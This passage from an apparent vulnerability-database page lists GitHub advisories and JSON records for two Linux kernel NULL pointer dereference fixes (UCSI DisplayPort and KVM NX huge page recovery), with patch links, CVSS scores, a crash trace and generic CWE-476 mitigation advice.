      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40905"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/html/ssa-355557.html"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/html/ssa-613116.html"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/09e5a5a80e205922151136069e440477d6816914"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/2498960dac9b6fc49b6d1574f7cd1a4872744adf"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/7e796c3fefa8b17b30e7252886ae8cffacd2b9ef"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/a0bc020592b54a8f3fa2b7f244b6e39e526c2e12"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/b01e1c030770ff3b4fe37fc7cc6bca03f594133f"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/c693698787660c97950bc1f93a8dd19d8307153d"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/c90af1cced2f669a7b2304584be4ada495eaa0e5"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P49G-R9VW-4FM8

Vulnerability from github – Published: 2025-05-29 15:31 – Updated: 2025-12-16 21:30
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

usb: typec: ucsi: displayport: Fix NULL pointer access

This patch ensures that the UCSI driver waits for all pending tasks in the ucsi_displayport_work workqueue to finish executing before proceeding with the partner removal.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-37994"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-29T14:15:35Z",
    "severity": "MODERATE"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: ucsi: displayport: Fix NULL pointer access\n\nThis patch ensures that the UCSI driver waits for all pending tasks in the\nucsi_displayport_work workqueue to finish executing before proceeding with\nthe partner removal.",
  "id": "GHSA-p49g-r9vw-4fm8",
  "modified": "2025-12-16T21:30:50Z",
  "published": "2025-05-29T15:31:09Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-37994"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/076ab0631ed4928905736f1701e25f1e722bc086"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/14f298c52188c34acde9760bf5abc669c5c36fdb"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/312d79669e71283d05c05cc49a1a31e59e3d9e0e"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/5ad298d6d4aebe1229adba6427e417e89a5208d8"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/7804c4d63edfdd5105926cc291e806e8f4ce01b5"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/9dda1e2a666a8a32ce0f153b5dee05c7351f1020"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/a9931f1b52b2d0bf3952e003fd5901ea7eb851ed"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/e9b63faf5c97deb43fc39a52edbc39d626cc14bf"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00010.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00007.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P4C2-XVQP-V8QJ

Vulnerability from github – Published: 2025-02-27 03:34 – Updated: 2025-03-06 12:30
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

KVM: x86/mmu: Ensure NX huge page recovery thread is alive before waking

When waking a VM's NX huge page recovery thread, ensure the thread is actually alive before trying to wake it. Now that the thread is spawned on-demand during KVM_RUN, a VM without a recovery thread is reachable via the related module params.

BUG: kernel NULL pointer dereference, address: 0000000000000040 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015 RIP: 0010:vhost_task_wake+0x5/0x10 Call Trace: set_nx_huge_pages+0xcc/0x1e0 [kvm] param_attr_store+0x8a/0xd0 module_attr_store+0x1a/0x30 kernfs_fop_write_iter+0x12f/0x1e0 vfs_write+0x233/0x3e0 ksys_write+0x60/0xd0 do_syscall_64+0x5b/0x160 entry_SYSCALL_64_after_hwframe+0x4b/0x53 RIP: 0033:0x7f3b52710104 Modules linked in: kvm_intel kvm CR2: 0000000000000040

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-21740"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-27T03:15:14Z",
    "severity": "MODERATE"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: x86/mmu: Ensure NX huge page recovery thread is alive before waking\n\nWhen waking a VM\u0027s NX huge page recovery thread, ensure the thread is\nactually alive before trying to wake it.  Now that the thread is spawned\non-demand during KVM_RUN, a VM without a recovery thread is reachable via\nthe related module params.\n\n  BUG: kernel NULL pointer dereference, address: 0000000000000040\n  #PF: supervisor read access in kernel mode\n  #PF: error_code(0x0000) - not-present page\n  Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n  RIP: 0010:vhost_task_wake+0x5/0x10\n  Call Trace:\n   \u003cTASK\u003e\n   set_nx_huge_pages+0xcc/0x1e0 [kvm]\n   param_attr_store+0x8a/0xd0\n   module_attr_store+0x1a/0x30\n   kernfs_fop_write_iter+0x12f/0x1e0\n   vfs_write+0x233/0x3e0\n   ksys_write+0x60/0xd0\n   do_syscall_64+0x5b/0x160\n   entry_SYSCALL_64_after_hwframe+0x4b/0x53\n  RIP: 0033:0x7f3b52710104\n   \u003c/TASK\u003e\n  Modules linked in: kvm_intel kvm\n  CR2: 0000000000000040",
  "id": "GHSA-p4c2-xvqp-v8qj",
  "modified": "2025-03-06T12:30:41Z",
  "published": "2025-02-27T03:34:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-21740"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/2b3928b7c896e5a9fb6b1373924adafe8e01a0c6"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/43fb96ae78551d7bfa4ecca956b258f085d67c40"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/974f85f1f7eb7dc7fce0988046e06eeccab576a7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation MIT-56
Implementation

For any pointers that could have been modified or provided from a function that can return NULL, check the pointer for NULL before use. When working with a multithreaded or otherwise asynchronous environment, ensure that proper locking APIs are used to lock before the check, and unlock when it has finished [REF-1484].

Mitigation
Requirements

Select a programming language that is not susceptible to these issues.

Mitigation
Implementation

Check the results of all functions that return a value and verify that the value is non-null before acting upon it.

Mitigation
Architecture and Design

Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values.

Mitigation
Implementation

Explicitly initialize all variables and other data stores, either during declaration or just before the first usage.

No CAPEC attack patterns related to this CWE.